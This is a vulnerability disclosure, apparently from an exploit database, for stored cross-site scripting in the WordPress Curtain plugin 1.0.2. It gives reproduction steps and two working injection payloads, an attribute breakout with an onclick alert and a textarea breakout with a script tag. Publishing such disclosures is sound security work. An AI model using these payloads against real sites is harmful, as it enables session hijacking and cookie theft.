WordPress Curtain plugin version 1.0.2 suffers from a persistent cross site scripting vulnerability.
dd409ca511bc0a28d91f8a872afb7a264e5d4cb727f4f0e12c12e46b3f19e402
# Exploit Title: Multiple Stored Cross-Site Scripting vulnerabilities
in WordPress curtain plugin 1.0.2
# Date: 29-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
# Version: 1.0.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# Description
Several Cross-Site Scripting vulnerabilities in the Curtain WordPress
plugin. Due to these Cross-Site Scripting vulnerabilities, an attacker
would be able to steal cookies, hijack sessions,s or control the browser of
the victim.
*Reproduce XSS in Heading Section:*
1- Login to your WordPress Application
2- Install curtain plugin
3- Open the page
http://wordpressURL/wp-admin/options-general.php?page=curtain
4- Inject Payload in Heading
"><h1 onclick=alert(1)>XSS</h1>
5- An alert will trigger.
*Reproduce XSS in Managers Textarea Section:*
1- Login to your WordPress Application
2- Install curtain plugin
3- Open the page
http://wordpressURL/wp-admin/options-general.php?page=curtain
4- Inject Payload in Managers as
"></textarea><script>alert(1)</script>
5- An alert will trigger.